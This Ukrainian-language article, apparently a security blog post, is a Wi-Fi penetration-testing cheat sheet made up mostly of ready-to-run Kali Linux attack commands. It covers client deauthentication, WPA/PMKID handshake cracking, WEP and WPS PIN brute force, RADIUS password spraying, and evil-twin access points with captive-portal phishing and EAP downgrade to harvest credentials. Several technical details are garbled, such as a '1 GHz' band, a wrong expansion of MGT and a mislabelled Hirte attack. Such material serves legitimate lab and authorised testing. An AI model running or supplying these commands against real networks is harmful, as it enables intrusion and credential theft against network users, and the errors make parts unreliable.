05.05.2023
4 хв
4642
Цей матеріал є справжнім чек-листом для тих, хто хоче перевірити свої знання та вміння в галузі безпеки бездротових мереж. У статті докладно описані різні методи та інструменти для тестування проникнення Wi-Fi, включаючи настроювання оточення на Kali Linux, моніторинг мереж, різні атаки на WPA/WPA2, а також поради щодо вибору обладнання для тестування.
Пам’ятайте, що використання отриманих знань і навичок має бути обмежене правовими та етичними рамками, а втручання в чужі мережі без дозволу є неприпустимим і незаконним. Все було протестовано на Kali Linux v2023.1 (64-розрядна версія) і базується на реальному досвіді та лабораторних розробках з тестування на проникнення Wi-Fi. Щоб отримати допомогу по роботі з інструментом, ви можете скористатися командою <назва_інструменту> [-h | -hh | –help] або man <назва_інструменту>Опція -h може конфліктувати з іншими опціями, наприклад, з опцією -host, і тому не може бути використана. У цьому випадку скористайтеся -h або –help або прочитайте настанову за допомогою команди man. Крім того, ви можете проігнорувати всі ці рекомендації і скористатися Google.
Дводіапазонний широкосмуговий бездротовий USB-адаптер стандарту 802.11ac AWUS036ACH забезпечує неймовірний радіус дії та швидкість для вашого комп’ютера Mac або Windows у мережі Wi-Fi – до 300 Мбіт/с у мережах 2,4 ГГц і 867 Мбіт/с у мережах 1 ГГц. AWUS036ACH оснащений технологією Wi-Fi AC1200 для чудової продуктивності і підключається до комп’ютера через USB 3.0. Це хороший адаптер для тих, хто не хоче витрачати час на встановлення сторонніх драйверів. Перші версії мали серйозні проблеми з живленням.
Будучи найбільш універсальною Wi-Fi картою на ринку, вона підтримує режим моніторингу більшості дистрибутивів Linux, включаючи Kali Linux і Debian, і має мало геморою з драйверами. Вона також сумісна з Windows, що дозволяє створювати точки доступу в Windows за допомогою драйверів і утиліт. Kali підтримує всі режими роботи (фальшиві точки доступу, кілька точок доступу, режими моніторингу та керування), майже всіма хакерськими інструментами на ринку. Підтримується. Основним обмеженням цієї карти є те, що вона не підтримує частоти 5 ГГц.
Двохдіапазонний Wi-Fi USB адаптер високої потужності з підтримкою стандарту 802.11ac та швидкістю передачі даних до 1300 Мбіт/с. З ціною, як у молодшої моделі.
Перегляд конфігурації мережних інтерфейсів:
ifconfig && iwconfig && airmon-ng
Не завжди все встановлено в системі
Увімкнення/вимкнення мережного інтерфейсу:
ifconfig wlan0 up ifconfig wlan0 down
Перезапуск менеджера мережі:
service NetworkManager restart
У цій команді:
” service ” – це команда, яка дозволяє керувати службами у системі.
” NetworkManager ” – це назва служби, яку ви хочете перезапустити.
” restart ” – це опція, яка вказує команді перезапустити вказану службу.
Перевірка регуляторної області бездротової мережі (WLAN):
iw reg get
Ця команда виконується через утиліту iw, яка дає змогу налаштувати бездротові інтерфейси в Linux. В результаті виконання команди “iw reg get” ви побачите інформацію про поточний регіон бездротового інтерфейсу.
Встановлення регуляторної області бездротової мережі (WLAN):
Збільшення/зменшення потужності бездротового інтерфейсу (висока потужність може бути незаконною в деяких країнах):
iwconfig wlan0 txpower 40
Варто зазначити, що для деяких wifi-адаптерів дана команда не працюватиме, наприклад для чіпів rtl8814au і rtl8812au
Різні країни накладають різні обмеження частотних каналів WiFi. Це може бути проблемою, якщо ваша мережева карта або операційна система змушують вас використовувати іншу конфігурацію, ніж вам потрібно. Існує безліч причин, чому це може відбуватися, починаючи від драйверів, що віддають перевагу налаштуванням EEPROM, і закінчуючи дивними рішеннями, заснованими на спостереженнях за активністю мережі.
Також можна використовувати додаткове програмне забезпечення для цієї настройки. Змінена конфігурація регулювання обмеження доступних частот і максимальної потужності передавача відповідно до регіональних налаштувань – посилання на github .
Встановлення бездротового інтерфейсу в режим моніторингу:
airmon-ng start wlan0 ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up
Встановлення бездротового мережного інтерфейсу в режим моніторингу на вказаному каналі:
airmon-ng start wlan0 8 iwconfig wlan0 channel 8
[Додатково] Зупинення служб, які можуть заважати роботі бездротових мережних інтерфейсів у режимі моніторингу:
airmon-ng check kill
Повернути бездротовий мережний інтерфейс у режим керування (managed mode):
airmon-ng stop wlan0mon ifconfig wlan0 down && iwconfig wlan0 mode managed && ifconfig wlan0 up
Шукайте бездротові мережі у вашій області:
airodump-ng --wps -w airodump_sweep_results wlan0mon wash -a -i wlan0mon
Моніторинг бездротової мережі для захоплення рукостискань/запитів:
airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid <ESSID> --bssid <BSSID>
Якщо ви вказали вихідний файл, не забудьте зупинити airodump-ngпісля завершення моніторингу, тому що це призведе до заповнення всього доступного місця на диску великим файлом PCAP.
Для отримання додаткової інформації про бездротові точки доступу, такі як їх MAC-адреса, назва виробника і т. д., ви можете використовувати інструменти, такі як Kismet Kismet – це потужний інструмент для моніторингу бездротових мереж та аналізу бездротового трафіку.
Перевірити підтримку бездротового інтерфейсу ін’єкції пакетів:
aireplay-ng --test wlan1 -e <ESSID> -a <BSSID>
” aireplay-ng ” – сама команда для виконання атак на бездротові мережі за допомогою Aircrack-ng;
” –test ” – це опція, яка вказує Aireplay-ng відправити тестовий запит;
” wlan1 ” – це ім’я бездротового інтерфейсу. Ви повинні замінити “wlan1” на ім’я вашого фактичного бездротового інтерфейсу;
-e <ESSID> – це опція, де “essid” повинен бути замінений на ім’я (ESSID) бездротової мережі (Wi-Fi), до якої ви хочете підключитися. Це означає, що ви намагаєтеся надіслати тестовий запит до вказаної мережі;
” -a <BSSID> ” – це опція, де “<BSSID>” має бути замінений на BSSID (MAC-адресу) точки доступу, до якої ви хочете надіслати тестовий запит.
Моніторинг бездротової мережі для захоплення чотириступеневого рукостискання WPA/WPA2:
airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid
” wlan0mon ” – це ім’я вашого моніторного (monitor) бездротового інтерфейсу. Ви повинні замінити wlan0mon на ім’я вашого фактичного інтерфейсу;
” –channel 8 ” – опція –channel” використовується для вказівки номера каналу, на якому ви хочете моніторити бездротові мережі.В цьому випадку, вибрали канал 8;
-w airodump_essid_results – опція -w використовується для вказівки префікса імені файлу, в який будуть записані результати моніторингу. В даному випадку результати будуть записані у файли з ім’ям “airodump_essid_results”.
[Опційно] Деаутентифікувати клієнтів з бездротової мережі:
aireplay-ng --deauth 10 wlan1 -e essid -a <BSSID>
Запустити атаку словником проти рукостискання WPA/WPA2:
aircrack-ng -e essid -b <BSSID> -w rockyou.txt airodump_essid_results*.\
-w rockyou.txt – опція -w використовується для вказівки словника паролів, який буде використовуватися при атаці на мережу. Тут rockyou.txt – це ім’я файлу з паролями. Ви можете замінити його на інший файл, якщо у вас є інший словник паролів, наприклад, від 3WiFi
Зламування аутентифікації WPA/WPA2 без деаутентифікації клієнтів.
Встановлення необхідних інструментів на Kali Linux:
apt update && apt -y install hcxtools
Почніть захоплення PMKID хешей для всіх довколишніх мереж:
hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0mon
–enable_status =1 — опція –enable_status встановлює значення 1 для включення виведення статусу (status) в консоль в реальному часі. Це корисно для відстеження прогресу збирання даних;
” -o hcxdumptool_results.cap ” – опція -o використовується для вказівки імені файлу, в який будуть записані результати збору даних. В даному випадку дані будуть записані у файл з ім’ям “hcxdumptool_results.cap”.
[Опціонально] Почніть захоплення хешів PMKID для вказаних бездротових мереж:
echo HH:HH:HH:HH:HH:HH | sed 's/\://g' >> filter.txt hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0mon --filterlist
Іноді потрібно кілька годин, щоб захопити один PMKID хеш. Вийміть PMKID хеші з файлу PCAP:
hcxpcaptool hcxdumptool_results.cap -k hashes.txt
Запустіть атаку словником хешів PMKID:
hashcat -m 22000 -a 0 --session=cracking --force --status -O -o hashcat_results.txt
Тут показаний життєвий спосіб для перебору hashcat-ом
Якщо цільова бездротова мережа не перевантажена, захоплення достатньої кількості IVs(initialization vectors) для злому аутентифікації WEP може зайняти кілька днів.
Щоб прискорити цей процес, виконайте фіктивну автентифікацію в бездротовій мережі з неіснуючою MAC-адресою та підтримуйте з’єднання:
aireplay-ng --fakeauth 8000 -o 1 -q 10 wlan1 -e essid
–fakeauth 6000 — опція –fakeauth використовується для виконання аутентифікації (authentication) до точки доступу (AP). Значення “6000” означає, що ви намагатиметеся автентифікуватися кожні 6000 мілісекунд (6 секунд). Ви можете змінити це значення на вашу думку.
-o 1 – опція -o використовується для вказівки номера операції (operation), яка виконується. В даному випадку “1” вказує на операцію аутентифікації. Операція “1” відповідає аутентифікації;
-q 10 – опція -q використовується для встановлення швидкості запитів (спроб) в секунду. Ваша команда встановлює швидкість 10 запитів на секунду;
-a <BSSID> – опція -a використовується для вказівки BSSID (MAC-адреси точки доступу) цільової мережі, до якої ви хочете підключитися;
-h <MAC> – опція -h використовується для вказівки MAC-адреси вашого власного бездротового інтерфейсу.
Якщо в мережі активовано фільтрування MAC-адрес, виконайте фіктивну автентифікацію в бездротовій мережі з наявною MAC-адресою:
aireplay-ng --fakeauth 0 wlan1 -e essid -a <BSSID> -h <MAC>
Щоб відстежувати кількість захоплених IVs(initialization vectors), запустіть airodump-ng для моніторингу бездротової мережі та стежте за стовпцем “#Data” (спробуйте захопити близько 100 000 IVs(initialization vectors)):
airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid <BSSID>
Запустіть стандартну атаку з повторенням ARP-запитів проти бездротової мережі:
aireplay-ng --arpreplay wlan1 -e essid -a <BSSID> -h <MAC>
[Додатково] Деаутентифікувати клієнтів з бездротової мережі:
aireplay-ng --deauth 10 wlan1 -e essid -a <BSSID>
Злам автентифікації WEP:
aircrack-ng -e essid -b <BSSID> replay_arp*.cap
Атака Hirte (High-rate Injection test) – це тест високошвидкісної ін’єкції, який використовується для перевірки безпеки бездротових мереж. Ця атака спрямована на перевірку, наскільки стійка мережа високошвидкісної ін’єкції пакетів.
Основна ідея атаки Hirte полягає в тому, що вона генерує високошвидкісний потік мережних пакетів та спрямовує його на бездротову мережу. Це може використовуватися для перевірки наявності вразливостей у мережному устаткуванні, яке може не справлятися з таким високим навантаженням.
Ця атака націлена на клієнтів, а не на точки доступу бездротових мереж. Вам необхідно знати SSID (ідентифікатори бездротових мереж) ваших цільових WiFi-мереж.
[Додатково] Налаштуйте фіктивну мережу WEP, якщо реальна мережа відсутня:
airbase-ng -W 1 -N wlan0mon -c 8 --essid essid -a <BSSID>
У разі потреби увімкніть бездротовий інтерфейс, щоб зв’язати клієнтів з фейковою WiFi-мережею. Ми розбирали, як це зробити, у першому пункті статті.
Щоб моніторити справжню/фейкову WiFi-мережу для захоплення рукостискань/запитів використовуйте:
airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid
Генерація пакетів клієнтів у Вашому радіусі відтворюється так:
aireplay-ng --cfrag -D wlan1 -e essid -h <MAC>
[Опціонально] Для деаутентифікації клієнтів від справжньої/фейкової WiFi-мережі використовується:
aireplay-ng --deauth 10 wlan1 -e essid -a <BSSID>
Перебір WEP-автентифікації:
aircrack-ng -e essid -b <BSSID> airodump_essid_results*.cap
WiFi Protected Setup, WPS – стандарт та однойменний протокол напівавтоматичного створення WiFi-мережі. Створений він був для спрощення розгортання та підключення до WiFi-мереж. Старий тип атаки, мало де можна застосувати, спробувати в лабораторії можна.
Існує два типи WPS:
WPS з пін-кодом із восьми цифр, де на клієнті потрібно ввести той самий код, то і на точці доступу
Кнопка WPS, яку потрібно на і на точці доступу, і на клієнті з інтервалом менше кількох хвилин
З усього цього виходить, що точки доступу WiFi з увімкненим WPS вразливі до атаки брутфорсу (перебору) PINа. При успішному переборі можна буде підключитися до точки доступу, а заразом і дізнатися про її WPA/WPA2 пароль. Перебір піна неможливий на точках доступу, де необхідно натискати кнопки.
Перебір WPS PINу:
reaver -vv --pixie-dust -i wlan1 -c 8 -e essid -b <BSSID>
-vv – Ця опція використовується для включення детального висновку, який буде показувати додаткову інформацію про процес атаки ;
” –pixie-dust ” – Ця опція вказує на використання методу атаки “Pixie Dust”. Метод “Pixie Dust” – це спосіб злому WPS, який намагається знайти вразливі пристрої та витягти з них необхідну інформацію для злому;
” -i wlan1 ” – Опція -i вказує ім’я безпроводового інтерфейсу, через який буде виконуватися атака. Замініть “wlan1” на ім’я фактичного бездротового інтерфейсу;
-c 8 – Опція -c використовується для вказівки номера каналу, на якому знаходиться цільова бездротова мережа. Тут вказано канал 8.
А для перебору PINу із затримкою між спробами використовуйте:
reaver -vv --pixie-dust -N -L -d 5 -r 3:15 -T 0.5 -i wlan1 -c 8 -e essid -b <BSSID>
-N – Ця опція вказує, що ви хочете виконувати атаку в режимі нон-моніторингу (non-monitor mode), що може бути корисним у деяких випадках;
” -L ” – Ця опція вказує на використання менш потужних і швидких атак, що може знизити ймовірність виявлення атаки;
“- d 5 ” – Опція -d вказує інтервал між спробами злому в секундах. В даному випадку інтервал встановлено на 5 секунд;
” -r 3:15 ” – Опція -r вказує діапазон значень для перевірки PIN-кодів. В даному випадку вказаний діапазон з 3 по 15;
-T 0.5 – Опція -T вказує інтервал між відправкою запитів у секундах. В даному випадку інтервал встановлено на 0.5 секунди.
WPA/WPA2 Enterprise – це один із найбільш безпечних методів забезпечення безпеки бездротових мереж, особливо в корпоративному середовищі. У цьому розділі статті ми розглянемо аспекти злому аутентифікації WPA/WPA2 Enterprise з використанням методу аутентифікації MGT (Machine-Generated Token).
Захоплення імен користувачів RADIUS:
За допомогою Wireshark: знайдіть поле «Ідентифікація» у повідомленнях EAP типу «Відповідь, Ідентифікація».
З використанням crEAP :
python crEAP.py -i mon0 -c <channel>
Перебір облікових записів RADIUS / Password Spraying
./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid <target_ESSID> \
--password <password_to_spray> \
--user-list <usernames_list>
Прапор --interface-poolвикористовується для надання eaphammer списку бездротових інтерфейсів, за допомогою яких буде створено багатозадачне виконання. Посилання на документацію
Захоплення та злом рукостискань LEAP та EAP-MD5
Протоколи EAP-MD5 та MD5 не використовують безпечний тунель для автентифікації клієнта. У зв’язку з цим існує можливість перехоплення виклику аутентифікації та відповіді на нього, а потім виконання офлайн-злому. Це означає, що дані автентифікації можуть бути ризикованими, якщо не застосовуються додаткові заходи безпеки.
Захоплення трафіку та запис захоплених рукостискань у файл:
airdump-ng -c <channel> --bssid <AP_MAC> -w <capture> mon0
(Додатково) Деаутентифікація клієнта від точки доступу:
aireplay-ng --deauth 5 -c <MAC_target> -a <MAC_AP> mon0
Злом:
eapmd5pass r <capture> -w <wordlist> # Для EAP-MD5 asleap -r <capture> -W <wordlist> # Для LEAP (злом MSCHAPv2 запиту/відповіді) asleap -C <mschapv2_challenge> -R <mschapv2_response> -W <wordlist> # Формат
asleap – демонструє серйозний недолік у пропрієтарних мережах Cisco LEAP. Оскільки LEAP використовує один із варіантів MS-CHAPv2 для автентифікаційного обміну, він чутливий до прискореної офлайнової атаки за словником. Asleap також може атакувати Point-to-Point Tunneling Protocol (PPTP) та будь-які обміни MS-CHAPv2, де в командному рядку ви можете вказати значення виклику та відповіді.
Зламування запиту/відповіді MSCHAPv2 (наприклад, EAP-PEAPv0, EAP-TTLS, EAP-FAST)
MSCHAPv2 може використовуватися як “Внутрішній протокол EAP/Аутентифікації” (всередині TLS-тунелю) у кількох методах EAP, таких як EAP-PEAPv0, EAP-TTLS, EAP-FAST.
Для захоплення виклику/відповіді MSCHAPv2 потрібно провести атаку “Шкідливий AP” (Evil Twin Attack) і вимкнути перевірку сертифіката сервера на стороні клієнта (див. eaphammer).
asleap -C <mschapv2_challenge> -R <mschapv2_response> -W <wordlist> CФормат запиту/відповіді з роздільниками у вигляді двокрапки
Для проведення атаки “Evil Twin” з використанням налаштування WPA/WPA2 потрібне знання парольної фрази цільової мережі (наприклад, на конференції, якщо пароль вже був зламаний…);
Якщо пароль невідомий, можна налаштувати атаку “Evil Twin” з відкритою мережею (наприклад, для спроби отримати парольну фразу за допомогою фішингу через атаку із захопленням сесії за допомогою порталу автентифікації).
Із загальним доступом до Інтернету (за замовчуванням):
berate_ap <interface_AP> <interface_internet> <SSID> <passphrase>
berate_ap – скрипт для створення фейкових точок доступу Wi-Fi.
Без спільного використання Інтернету:
berate_ap -n <interface_AP> <SSID> <passphrase>
Загальний доступ до Інтернету через міст (попередньо налаштований інтерфейс моста):
berate_ap -m bridge <interface_AP> <interface_internet> <SSID> <passphrase>
Спільне використання Інтернету з того ж інтерфейсу Wi-Fi:
berate_ap <interface_AP> <interface_AP> <SSID> <passphrase>
Увімкнути IEEE 802.11n (з частотою 40 МГц):
berate_ap --ieee80211n --ht_capab '[HT40+]' <interface_AP> <interface_internet> <SSID> <passphrase>
Включити ізоляцію клієнта:
berate_ap --isolate-clients <interface_AP> <interface_internet> <SSID> <passphrase>
Captive Portal Attack (атака захоплення порталу) – це вид атаки на безпеку мережі, при якій зловмисник створює уявний точку доступу Wi-Fi (Wi-Fi hotspot) з метою обдурити користувачів та змусити їх підключатися до цієї точки доступу. Коли користувачі підключаються до такої точки доступу, вони можуть бути перенаправлені на веб-сторінку, відому як “захоплюваний портал” або “сторінка, що захоплюється”. На цій сторінці користувачі можуть попросити ввести облікові дані, кредитну інформацію або інші особисті дані, які зловмисники можуть використовувати в шахрайських цілях.xтувати їх пристрої.
З використанням wifiphisher :
wifiphisher -aI <interface_rogue_AP> -jI <interface_jamming> --essid <target_SSID> -pK <passphrase> -kN
З використанням eaphammer:
./eaphammer -i wlan0 --channel <channel_number> --auth wpa-psk --essid <SSID> --wpa-passphrase <passphrase> --captive-portal # WPA2 за замовчуванням. /eaphammer -i wlan0 --channel <channel_number> --auth wpa-psk --essid <SSID> --wpa-passphrase <passphrase> --captive-portal --wpa-version 1 # Примусовий WPA1
Для досягнення найкращих результатів у фішингу:
Клонувати легальну сторінку;
Скопіюйте клоновану веб-сторінку в каталог /var/www/html/ (eaphammer обслуговує веб-сторінку звідси відповідно до конфігурації Apache2 за промовчанням).
./eaphammer -i wlan0 --channel <channel_number> --auth wpa-psk \ --essid <SSID> --wpa-passphrase randompassphrase --capture-wpa-handhshake
Атака “Evil Twin” на мережі WPA/WPA2-Enterprise можлива лише у випадку, якщо:
Метод EAP, що використовується для автентифікації клієнта, не використовує клієнтський сертифікат (наприклад, EAP-TLS, PEAPv0(EAP-TTLS)), тому що в цьому випадку немає облікових даних, які можна було б вкрасти.
Метод EAP, що використовується для аутентифікації клієнта, не вимагає серверного сертифіката (наприклад, EAP-MD5, LEAP), або в розгортанні EAP не потрібно перевірити сертифікати сервера на робочих станціях (або клієнт вручну приймає недійсний сертифікат, якщо це можливо).
Стандартні показники:
Ця атака ефективна проти пристроїв на ОС Android.
Ефективна проти пристроїв на операційній системі iOS, але може вимагати підтвердження сертифіката.
Проти пристроїв на операційній системі Windows може бути захоплений лише дзвінок-відповідь.
Цей тип атаки може використовуватися для крадіжки облікових даних RADIUS (у чистому вигляді або найчастіше виклик-відповідь, наприклад, MSCHAPv2), коли використовується EAP з автентифікацією клієнта на основі облікових даних.
За допомогою berate_ap: (Додатково) Для більш переконливої атаки сертифікат, наданий користувачам під час аутентифікації, повинен бути схожим на легітимний сертифікат. Сертифікат, що використовується легітимною точкою доступу (AP), можна отримати з захоплення мережі за допомогою наступного інструмента: посилання на скрипт .
./extract_EAP.sh -r <capture file> ./extract_EAP.sh -i mon0
Створення корпоративної мережі (запросить інформацію для використання у сертифікаті, що створюється) і захоплення облікових даних EAP:
berate_ap --eap --mana-wpe --mana-credout <file_captured_creds> <interface_AP> <interface_internet> <SSID>
Підтримувані режими EAP, як мінімум: посилання на документацію :
EAP-PEAP/MSCHAPv2 (both PEAPv0 та PEAPv1)
EAP-PEAP/GTC (both PEAPv0 та PEAPv1)
EAP-PEAP/MD5 (both PEAPv0 та PEAPv1)
EAP-TTLS/EAP-MD5
EAP-TTLS/EAP-GTC
EAP-TTLS/EAP-MSCHAPv2
EAP-TTLS/MSCHAPv2
EAP-TTLS/MSCHAP
EAP-TTLS/PAP
EAP-TTLS/CHAP
EAP-MD5
EAP-MSCHAPv2
EAP-GTC
З використанням eaphammer:
Створення self-signed сертифікатів x.509.
./eaphammer --cert-wizard
Інформація про сертифікати: посилання на документацію .
Запустіть атаку “Шкідливий AP” проти точки доступу WPA-Enterprise і захопіть облікові дані EAP:
./eaphammer -i wlan0 --channel <channel_number> --auth wpa-eap \ --essid <SSID_corporate_wifi> --creds # Использование WPA2 по-умолчанию
Збалансований підхід (найефективніший). При використанні eaphammer стандартна поведінка полягає у використанні збалансованого підходу до зниження рівня EAP. Він пропонує наступні послідовності методів EAP під час узгодження EAP:
# Phase 1 (outer authentication)
PEAP,TTLS,TLS,FAST
# Phase 2 (inner authentication)
GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5Eaphammer спочатку намагається знизити рівень до GTC, а потім відразу переходить до більш надійних методів EAP, якщо спроба не вдається. Цей збалансований підхід розроблено для максимізації впливу при мінімізації ризику тривалих погоджень EAP. Референс – Посилання
Повне зниження версії EAP (з найсильнішого до найслабшого)
./eaphammer -i wlan0 --channel <channel_number> --auth wpa-eap --essid <SSID_corporate_wifi> --negotiate weakest --creds
У цьому випадку eaphammer пропонує методи EAP у такому порядку:
# Phase 1 (outer authentication) PEAP,TTLS,TLS,FAST # Phase 2 (inner authentication) GTC,TTLS-PAP,MD5,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,TTLS-MSCHAPV2,TTLS
Попередження: більш ймовірне збільшення часу узгодження EAP (низька ймовірність успіху PAP, MD5, CHAP), що може знизити ефективність атаки!
Підхід, оптимізований за швидкістю (від найсильнішого до найслабшого)
./eaphammer -i wlan0 --channel <channel_number> --auth wpa-eap \ --essid <SSID_corporate_wifi> --negotiate speed --creds
У цьому випадку eaphammer пропонує методи EAP, які з найбільшою ймовірністю будуть успішними насамперед:
# Phase 1 (outer authentication) PEAP,TTLS,TLS,FAST Phase 2 (inner authentication) MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,GTC,TTLS-PAP,TTLS-MSCHAP,MD5
Використовуйте цей режим, якщо у вас виникли проблеми із завершенням процесу автентифікації EAP клієнтами в режимі за промовчанням.
Ця атака може бути використана, коли метод EAP використовує MSCHAPv2 для автентифікації клієнта. Вона надсилає виклик/відповідь до оригінальної точки доступу (AP), щоб мати можливість підключитися до мережі без необхідності зламувати облікові дані MSCHAPv2.
Створення Evil Twin AP:
berate_ap --eap --mana-wpe --wpa-sycophant --mana-credout <file_captured_creds> \ <interface_AP> <interface_internet> <SSID>
Створіть файл конфігурації для wpa-sycophant на основі цього прикладу або вивчіть GitHub :
network={
ssid="TestingEAP"
# SSID, який ви хочете ретранслювати та аутентифікувати.
scan_ssid=1
key_mgmt=WPA-EAP
# Do not modify
identity=""
anonymous_identity=""
password=""
# Это инициализирует переменные для меня.
# -------------
eap=PEAP
phase1="crypto_binding=0 peaplabel=0"
phase2="auth=MSCHAPV2"
# Ми не хочемо зворотного підключення до себе, тож додайте сюди свій підроблений BSSID.
bssid_blacklist=00:00:00:00:00:00
}
Запустіть wpa-sycophant:
./wpa_sycophant.sh -c wpa_sycophant_example.conf -i <interface>
RADIUS Credentials Management
Важливо: для проведення додаткових атак на корпоративну мережу WPA-Enterprise потрібне знання облікових даних RADIUS клієнта у більшості методів EAP (особливо у методах EAP, що потребують взаємної автентифікації, наприклад, MSCHAPv2).
Облікові дані RADIUS мають бути додані у файл eap_user hostapd. У eaphammer доступний інтерфейс для виконання цієї операції:
./ehdb --list ./ehdb --add --identity <username> --password <password> # Додати облікові записи до бази даних ./ehdb --add --identity <username> --nt-hash <ntlm_hash> # Додати облікові записи з хешем NTLM до бази даних ./ehdb --delete --identity-is <username> # Видалити запис з бази даних ./ehdb --delete --delete-all # Видалити всі записи в базі даних
Референс – Посилання
Важливо: потрібне знання облікових даних клієнта RADIUS (доданих у файл eap_user hostapd) у більшості методів EAP (особливо в методах EAP, що потребують взаємної автентифікації, наприклад, MSCHAPv2).
/eaphammer -i wlan0 --channel <channel_number> --auth wpa-eap \ --essid <SSID_corporate_wifi> --captive-portal
Для досягнення найкращих результатів у фішингу:
Клонувати легальну сторінку;
Скопіюйте клоновану веб-сторінку в каталог /var/www/html/ (eaphammer обслуговує веб-сторінку звідси відповідно до конфігурації Apache2 за промовчанням).
Важливо: потрібне знання облікових даних клієнта RADIUS (доданих у файл eap_user hostapd) у більшості методів EAP (особливо в методах EAP, що потребують взаємної автентифікації, наприклад, MSCHAPv2).
Атака з використанням ворожого порталу перенаправляє HTTP-трафік на SMB-ресурс, що знаходиться на машині атакуючого.
./eaphammer -i wlan0 --channel <channel_number> --auth wpa-eap \ --essid <SSID_corporate_wifi> --hostile-portal
Атака KRACK (Key Reinstallation Attack) на бездротові мережі Wi-Fi була виявлена в 2017 році і привернула значну увагу кібербезпечних фахівців та спільноти загалом. Атака KRACK експлуатує вразливість у протоколі безпеки Wi-Fi WPA2 (Wi-Fi Protected Access 2), який раніше вважався стандартом безпеки для більшості бездротових мереж.
Референс – Посилання
Password Spraying – атака, в якій зловмисник бере максимально можливу кількість імен користувачів та кілька паролів, а потім підбирає кожне з імен користувачів, доки одне з них не буде правильно підібрано.
Але для відтворення даної атаки Вам в першу чергу знадобляться кілька добрих ключових слів, здатних описати Вашу мету. Такими можуть бути:
Ім’я компанії;
Абревіатури;
Щось, що з сервісами чи продуктами мети;
І так далі.
Якщо увімкнено фільтрацію MAC-адрес, змініть MAC бездротового інтерфейсу на існуючий:
ifconfig wlan0 down && macchanger --mac <MAC> && ifconfig wlan0 up
Коли Ви отримали доступ до WiFi-мережі, пройдіться такими інструментами:
Спробуйте підключитись до WEB-інтерфейсу точки доступу. Пошукайте в Інтернеті список шляхів та облікових записів за промовчанням. Запустіть сканування/перебір мережі.
